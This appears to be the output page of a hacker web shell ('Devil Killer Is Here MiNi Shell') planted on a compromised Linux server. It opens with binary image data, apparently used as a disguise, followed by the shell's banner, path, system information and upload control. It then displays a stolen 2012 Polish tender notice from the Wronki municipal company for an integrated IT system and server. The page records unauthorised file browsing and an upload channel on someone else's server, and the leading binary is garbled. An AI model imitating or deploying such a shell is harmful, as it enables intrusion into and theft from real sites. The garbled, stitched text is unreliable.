JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120328/95968-N-2012.html

<p class="kh_header"><b>Wronki: Dostawa i wdrożenie Zintegrowanego Systemu Informatycznego oraz relacyjnej bazy danych, wraz z serwerem</b><br>
<b>Numer ogłoszenia: 95968 - 2012; data zamieszczenia: 28.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Komunalne Sp. z o.o. we Wronkach , ul. Ratuszowa 3, 64-510 Wronki, woj. wielkopolskie, tel. 067 2540163, faks 067 2540645.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i wdrożenie Zintegrowanego Systemu Informatycznego oraz relacyjnej bazy danych, wraz z serwerem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
A.	Dostawa i wdrożenie Zintegrowanego Systemu Informatycznego (ZSI), który powinien obsługiwać następujące zagadnienia:

-System bilingowy woda i ścieki wraz z systemem inkasenckim,
-System gospodarki wodomierzowej,
-Ewidencja sieci i opomiarowania,
-Ewidencja infrastruktury wraz z fakturowaniem usługi wywozu nieczystości,
-Finanse i księgowość,
-Zestawienia analityczne i sprawozdawczość,
-Biuro obsługi klienta,
-Zarządzanie obiegiem dokumentów i informacji,
-Internetowe Biuro Obsługi Klienta,
-Środki trwałe,
-Pozostała sprzedaż,
-Gospodarka materiałowa,
-Transport,
-Kadry,
-Płace,
-Rozliczenie  mediów, gospodarka licznikami
-Rozrachunki i windykacja należności
-Informacja o stanie finansowym punktu rozliczeniowego, windykacja należności,
-Rozliczenie wspólnot mieszkaniowych i nieruchomości
   -Cenniki
   -Naliczenia
   -Finanse i księgowość
   -Zarządzanie infrastrukturą, ewidencja zasobów,
   -Ewidencja opłat czynszowych,
   -Rozliczenie  mediów, gospodarka licznikami,
   -Informacja o stanie finansowym punktu rozliczeniowego, windykacja należności
   -Rozliczenie wspólnot mieszkaniowych i nieruchomości,
   -Remonty i inwestycje.
   -Gospodarka Mieszkaniowa - obsługa lokali mieszkalnych i użytkowych:

Zamówienie polega również na:
-	wykonaniu analizy przedwdrożeniowej (ustalenie potrzeb, ustalenie modułów, ustalenie wyglądu i zawartości formatek wydruków, ustalenie planu i zakresu wdrożenia),
-	konwersji niezbędnych danych z dotychczasowego oprogramowania używanego przez Zamawiającego do nowego systemu,
-	instalacji i konfiguracji dostarczonego oprogramowania na serwerze i stacjach roboczych,
-	parametryzacji ZSI,
-	szkoleniu pracowników w zakresie obsługi ZSI,
-	opiece powdrożeniowej

Zamawiający dopuszcza możliwość, że dana funkcjonalność będzie dostępna z innego poziomu (modułu), niż ten, który jest podany w załączniku nr 6 do Specyfikacji Istotnych Warunków Zamówienia (SIWZ).
Zamawiający dopuszcza możliwość innego nazewnictwa modułów pod warunkiem, że spełnia on funkcjonalności wymienione w załączniku nr 6 do SIWZ.
Zamawiający wymaga od Wykonawcy, aby czas reakcji w przypadku zgłoszenia awarii/usterki wymagającej osobistego wsparcia wynosił do 12 godzin od momentu zgłoszenia.
Ocena spełnienia warunku nastąpi w oparciu o oświadczenie Wykonawcy złożone na formularzu ofertowym o zapewnieniu wymaganego czasu reakcji na zgłoszenie poprzez osobiste wsparcie.


Ogólne wymagania funkcjonalne Zintegrowanego Systemu Informatycznego

1.	Oferowany ZSI musi być systemem w pełni zintegrowanym, pracującym na jednej wspólnej bazie danych źródłowych dla wszystkich modułów aplikacyjnych. Dane mają być wprowadzane tylko jeden raz w wybranym miejscu Systemu, a w innych miejscach Systemu należy wprowadzone informacje tylko udostępniać.
2.	Dopuszcza się jedynie rozwiązania oparte o relacyjną bazę danych, wykorzystującą język SQL.
3.	Zamawiający musi mieć pełen dostęp do zawartych w bazie informacji.
4.	ZSI musi spełniać wymogi polskiego prawa (zwłaszcza ustawę o rachunkowości i rozliczeniach podatkowych oraz ustawę o ochronie danych osobowych) i musi być systematycznie aktualizowany, zgodnie ze zmieniającymi się przepisami.
5.	Wszystkie moduły programowe oferowanego ZSI muszą pochodzić od jednego producenta oprogramowania.
6.	System ma być wyposażony w polskojęzyczny interfejs (wszystkie komunikaty, menu, raporty, pomoc kontekstowa, okna do wprowadzania danych, podpowiedzi, zapytania, instrukcje dla użytkownika i inne).
7.	Interfejs użytkownika musi umożliwiać pracę w środowisku MS WINDOWS (XP SP2, Vista, 7), w wersji 32-bitowej i 64-bitowej, gwarantując wygodne wprowadzanie danych i przejrzystą prezentację danych na ekranie.
8.	Okna prezentujące dane w postaci tabelarycznej muszą być wyposażone w funkcjonalności sortowania według wybranych kolumn oraz zakładania przez użytkownika filtra wyświetlanej zawartości.
9.	System musi umożliwiać wykonywanie wydruków na dowolnym urządzeniu drukującym zainstalowanym w środowisku Windows.
10.	ZSI ma pracować w technologii Klient-Serwer z możliwością równoczesnego korzystania z bazy danych przez wielu użytkowników, w tym użytkowników pracujących poza siedzibą firmy.
11.	Oprogramowanie musi zapewniać identyfikację i kontrolę tożsamości użytkowników, uniemożliwiać wprowadzenie danych w sposób anonimowy,  rejestrować daty, czas i osoby wprowadzające zmiany danych w systemie.
12.	System musi zapewniać wysoki poziom bezpieczeństwa i ochrony danych przetwarzanych, przechowywanych i transportowanych przed nieautoryzowanym dostępem z zewnątrz i wewnątrz sytemu.
13.	Przejście z jednego modułu do drugiego (w ramach uprawnień użytkownika) następuje bez konieczności ponownego logowania się do następnego modułu - dostęp do wszystkich przyznanych użytkownikowi zasobów  systemu ma być zapewniony po jednokrotnym wpisaniu identyfikatora (nazwy) użytkownika i jego hasła.
14.	System musi zapewniać ciągły dostęp do aktualnych danych zapewniając natychmiastową aktualizację informacji w bazach danych podczas rutynowych czynności wykonywanych na stanowiskach pracy.
15.	System musi mieć możliwość pełnej archiwizacji danych oraz możliwość łatwego odtworzenia danych w razie awarii.
16.	System powinien zapewnić kontrolę poprawności wprowadzania danych przez wykorzystanie słowników systemowych oraz walidację poprawności wprowadzanych danych.
17.	ZSI musi posiadać zabezpieczenia przed skasowaniem danych, które są powiązane z innymi danymi w systemie lub ich ostateczność została potwierdzona w inny sposób - poprzez odpowiednio wysoki status, przynależność do już zamkniętego miesiąca, itp.
18.	System musi posiadać mechanizmy kontroli spójności wprowadzanych danych, w tym wymuszanie pól obowiązkowych.
19.	System musi zawierać wbudowane standardowe raporty (wzory), a ponadto posiadać generator raportów i zestawień oraz umożliwiać wykonywanie wszelkiego rodzaju analiz na wprowadzonych danych oraz umożliwiać tworzenie raportów przez użytkownika z wykorzystaniem języka SQL.
20.	System musi pozwalać użytkownikom na tworzenie szablonów dokumentów oraz ich rejestracji w celu udostępnienia innym użytkownikom.
21.	System musi umożliwiać automatyczne generowanie sprawozdań wymaganych przepisami, w formacie dokumentów wymaganym przez instytucje zewnętrzne (Urząd Skarbowy, ZUS, Urząd Statystyczny) a w obszarach dopuszczonych przez organy państwowe - także w postaci e-deklaracji.
22.	System musi zapewniać wymianę danych z aplikacjami zewnętrznymi (np. Płatnik, home banking). Musi umożliwiać eksport wszelkich zestawień, sprawozdań czy raportów do formatów czytanych przez programy Excel i Word oraz do formatu PDF.
23.	System ma umożliwiać bezproblemową zmianę na walutę Euro, w przypadku przystąpienia Polski do unii monetarnej.
24.	System musi mieć opracowany zestaw dokumentacji zawierający instrukcje obsługi dla użytkowników oprogramowania w postaci podręczników.
25.	W przypadku, gdy moduł do zarządzania wspólnotami mieszkaniowymi posiada ograniczenie liczby obsługiwanych wspólnot, wymagana jest obsługa przynajmniej 100 wspólnot mieszkaniowych.

Szczegółowy opis wymagań funkcjonalnych Zintegrowanego Systemu Informatycznego stanowi załącznik nr 6 do SIWZ.

Niespełnienie ogólnych wymagań funkcjonalnych  (pkt 1 do 25) będzie skutkować odrzuceniem oferty. Odrzuceniem oferty będzie także skutkować niespełnienie wymagań stawianych poszczególnym modułom w sytuacji niespełniania więcej niż 10% wymagań w każdym z modułów.
Załącznik nr 6 jest wymagany w celu oceny ofert w kryterium (funkcjonalność) i  z tego powodu nie będzie podlegał reżimowi art. 26 ust. 3 i 4 ustawy Pzp.

Zamawiający zastrzega sobie możliwość wezwania Wykonawcy do przeprowadzenia prezentacji zaoferowanego Zintegrowanego Systemu informatycznego w celu potwierdzenia, że system jest zgodny ze specyfikacją przedmiotu zamówienia.

 
B.	Dostawa relacyjnej bazy danych obejmująca licencję dla 30 równoczesnych użytkowników.

Wymagana licencja na bazę danych: udzielona zamawiającemu, bezterminowa.

Dostawa, instalacja i konfiguracja niezbędnego środowiska informatycznego obejmującego:
-oprogramowanie systemowe,
-oprogramowanie bazodanowe,
-inne oprogramowanie narzędziowe i administracyjne niezbędne do uruchomienia i prawidłowej eksploatacji ZSI,
-dostarczenie wraz z systemami wszelkich niezbędnych licencji,

C. Dostawa serwera wraz z oprogramowaniem systemowym.

Platforma serwerowa obejmuje:

Typ obudowy serwera	Rack (2U)
Ilość zainstalowanych procesorów	2 szt.
Maksymalna ilość procesorów	2 szt.
Typ zainstalowanego procesora	Intel Xeon (Quad-Core) (lub równoważny wyraźnie rekomendowany przez producenta do zastosowań serwerowych)
Kod procesora	E5620 lub równoważny
Częstotliwość procesora	2,4 GHz
Częstotliwość szyny FSB	1066 MHz
Przepustowość szyny	QPI/DMI 5,86 GT/s
Pojemność pamięci cache [L3]	Min. 12 MB
Ilość zainstalowanych dysków	4 szt.
Maksymalna ilość dysków	8 szt.
Pojemność każdego zainstalowanego dysku	300 GB
Typ zainstalowanego dysku	SAS, Hot Plug, 15000 RPM
Zainstalowane sterowniki dysków	8 x SATA/SAS
Sterownik macierzy	PERC H700 SAS RAID 0/1/5/6/10/50/60 512MB with BBU lub równoważny. 
	Dyski skonfigurowane w RAID 5
Ilość banków pamięci	przynajmniej 8, w tym min. 2 banki pamięci wolne
Pojemność zainstalowanej pamięci	Min. 12 GB
Rodzaj zainstalowanej pamięci	DDR3
Typ pamięci	Registered, Low Voltage
Częstotliwość szyny pamięci	1333 MHz
Elementy Hot-Swap	Dyski twarde, Zasilacze
Karta sieciowa	2 x 10/100/1000 Mbit/s
Napędy wbudowane (zainstalowane)	DVD?RW
Interfejs USB 2.0	przynajmniej 4
Ilość zasilaczy	2 szt.
Moc zasilacza (zasilaczy)	Min. 750 W każdy
Systemy operacyjny	Microsoft Windows 2008 Server Standard R2 PL, 64-bit OEM, licencja na 15 użytkowników.

Wszystkie podzespoły serwera muszą być zainstalowane firmowo przez producenta serwera. Serwer musi być nowy, wyprodukowany przez producenta sprzętu komputerowego - w tym serwerów, nie dopuszcza się tzw. składaków.
 
D.	Gwarancja na Zintegrowany System informatyczny obejmująca
-12 miesięczny okres od daty zakończenia wdrożenia (podpisania protokołu odbioru końcowego).
-Gwarancja obejmuje nieodpłatne wykonanie poprawek celem usunięcia wad i błędów w ZSI,
-W ramach gwarancji Wykonawca zobowiązuje się do dostarczenia nowych wersji oprogramowania uwzględniających zmiany w obowiązującym prawodawstwie,
-Świadczenie wsparcia użytkownikom systemu w okresie pierwszych 3 miesięcy po wdrożeniu ZSI,
-Serwis gwarancyjny w zakresie funkcjonowania serwera na okres 36 miesięcy od  daty podpisania protokołu odbioru końcowego. Serwis pogwarancyjny: po zakończeniu okresu gwarancyjnego.
Miejsce realizacji zamówienia: siedziba Zamawiającego tj. ul. Ratuszowa 3, 64-510 Wronki.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 i 7 ustawy Pzp w wysokości do 20% wartości zamówienia podstawowego.

Potencjalny zakres - zależnie od potrzeb: dokupienie dodatkowych bezterminowych licencji na moduły wchodzące w skład ZSI, dokupienie dodatkowych bezterminowych licencji na użytkowników bazy danych, dokupienie dodatkowych licencji bezterminowych na użytkowników systemu operacyjnego serwera, doposażenie sprzętowe serwera, opracowanie i wdrożenie dodatkowych modułów ZSI, niewymienionych w SIWZ, przeprowadzenie dodatkowych szkoleń</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.26.30.00-6, 48.00.00.00-8, 48.61.00.00-7, 48.82.00.00-2, 80.53.31.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wysokość wadium. 
Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości 5.000 zł (słownie: pięć tysięcy złotych).

2.	Forma wadium.
1)	Wadium może być wniesione w następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2007 nr 42, poz. 275 z późn. zm.).

2)	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b)	określenie wierzytelności, która ma być zabezpieczona gwarancją,
c)	kwotę gwarancji,
d)	termin ważności gwarancji
e)	zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie,
iż:
-	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp., nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp. lub pełnomocnictw oraz nie udowodnił, że wynika to z przyczyn nie leżących po jego stronie.
lub, że:
-	Wykonawca, którego ofertę wybrano:
a) odmówił podpisania umowy na warunkach określonych we ofercie, lub
b) nie wniósł zabezpieczenia należytego wykonania umowy, lub
c) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;

3)	Postanowienia pkt III.1).2.2) stosuje się odpowiednio do poręczeń, określonych powyżej w pkt. III.1).2.1)b) i III.1).2.1)e).

Wniesione wadium przez Wykonawców wspólnie ubiegających się o zamówienie w postaci gwarancji lub poręczenia musi wyraźnie wskazywać, iż jest ono wystawione na rzecz wszystkich podmiotów składających ofertę wspólną.

3.	Miejsce i sposób wniesienia wadium.

1) Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego:

	Bank PEKAO SA we Wronkach 35 1240 3754 1111 0000 4372 7591

Do oferty należy dołączyć kopię polecenia przelewu potwierdzoną za zgodność z oryginałem.

2) Wadium wnoszone w innych dopuszczonych przez Zamawiającego formach należy złożyć w siedzibie spółki Przedsiębiorstwo Komunalne Sp. z o.o. we Wronkach, ul. Ratuszowa 3, 64-510 Wronki, poprzez dołączenie oryginału dokumentu wadialnego do oryginału oferty.


4.	Termin wniesienia wadium.
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. 

W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym, ale nie wystarczającym, do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.

5.	Zwrot wadium.
Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 ustawy Pzp.

6.	Utrata wadium.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp., nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp. lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

Ponadto Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek, jeżeli złoży oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, dostarczył, wdrożył i utrzymuje ZSI w co najmniej 
3 podmiotach wykonujących działalność związaną z eksploatacją sieci przeznaczonych do świadczenia publicznych usług związanych z  dystrybucją wody pitnej lub odbiorem i oczyszczaniem ścieków, a system działa tam do chwili obecnej, przy czym:

a)	wdrożenie zintegrowanego systemu informatycznego obejmowało jednocześnie co najmniej: moduł bilingowy, księgowość i finanse, kadry i płace, magazyn, środki trwałe,
b)	wartość każdego z powyższych kontraktów wynosiła co najmniej 150.000,00 zł netto (bez kosztów sprzętu komputerowego)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek, jeżeli złoży oświadczenie o spełnianiu warunków udziału w postępowaniu oraz przedstawi co najmniej 2 osoby, które będą brały udział we wdrożeniu bezpośrednio w siedzibie zamawiającego, a które posiadają doświadczenie w realizacji co najmniej jednego wdrożenia o podobnym zakresie tj. obejmującego jednocześnie moduły wymienione w p. III.3.2).a) i o wartości przynajmniej jak w punkcie III.3.2).b).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oferent wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej na kwotę co najmniej 1 mln zł w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, czyli na dostawę, wdrożenie i serwis systemów informatycznych. Ubezpieczenie musi być ważne również w całym okresie wdrożenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

